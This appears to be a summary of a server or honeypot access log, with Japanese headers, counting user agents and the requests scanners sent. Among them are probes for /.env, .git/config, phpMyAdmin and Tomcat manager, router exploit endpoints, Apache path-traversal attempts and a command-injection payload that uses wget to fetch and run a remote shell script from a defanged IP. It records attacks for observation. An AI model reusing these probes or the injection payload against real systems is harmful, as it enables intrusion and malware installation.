1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
24 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
8 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
4 | Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/) |
1 | Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 |
4 | Mozilla/5.0 zgrab/0.x |
2 | Mozilla/5.0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | - |
||
2 | \x03 |
||
2 | \x16\x03\x01\x01H\x01 |
||
1 | \x16\x03\x01\x01\xfb\x01 |
||
17 | \x16\x03\x01 |
||
1 | \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 |
X\xd4>\x12\x98\xc4<\xe0\x13\xcf | |
24 | GET | /.env |
HTTP/1.1 |
1 | GET | /.git/config |
HTTP/1.1 |
1 | GET | /.well-known/security.txt |
HTTP/1.1 |
1 | GET | //MyAdmin/scripts/setup.php |
HTTP/1.1 |
1 | GET | //myadmin/scripts/setup.php |
HTTP/1.1 |
1 | GET | //phpMyAdmin/scripts/setup.php |
HTTP/1.1 |
1 | GET | //phpmyadmin/scripts/setup.php |
HTTP/1.1 |
1 | GET | //pma/scripts/setup.php |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
1 | GET | /actuator/health |
HTTP/1.1 |
1 | GET | /admin/ |
HTTP/1.1 |
1 | GET | /card |
HTTP/1.1 |
1 | GET | /cdn-cgi/trace |
HTTP/1.1 |
1 | GET | /cgi-bin/luci?language=$(wget%20http[:]//163[.]123[.]143[.]126/tenda.sh;sh%20 netlog.sh) |
|
1 | GET | /client/get_targets |
HTTP/1.1 |
1 | GET | /explore |
HTTP/1.1 |
6 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /geoip/ |
HTTP/1.1 |
1 | GET | /hudson |
HTTP/1.1 |
9 | GET | /manager/html |
HTTP/1.1 |
1 | GET | /muieblackcat |
HTTP/1.1 |
1 | GET | /portal/redlion |
HTTP/1.1 |
1 | GET | /robots.txt |
HTTP/1.1 |
1 | GET | /sitemap.xml |
HTTP/1.1 |
1 | GET | /solr/ |
HTTP/1.1 |
1 | GET | /sugar_version.json |
HTTP/1.1 |
1 | GET | /systembc/ |
HTTP/1.1 |
1 | GET | /systembc/password.php |
HTTP/1.0 |
1 | GET | /upl.php |
HTTP/1.1 |
1 | GET | /webfig/ |
HTTP/1.1 |
1 | GET | /xkyyy/145705-1-1.html |
HTTP/1.1 |
1 | GET | http[:]//www[.]1ucn[.]com/proxychecker/index.php |
HTTP/1.1 |
1 | HEAD | /icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png |
HTTP/1.1 |
1 | HEAD | /icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png |
HTTP/1.1 |
1 | HEAD | /icons/.%2e/%2e%2e/apache2/icons/sphere1.png |
HTTP/1.1 |
1 | HEAD | /icons/sphere1.png |
HTTP/1.1 |
1 | POST | /GponForm/diag_Form?images/ |
HTTP/1.1 |
1 | POST | /HNAP1/ |
HTTP/1.1 |
8 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
4 | PRI | * |
HTTP/2.0 |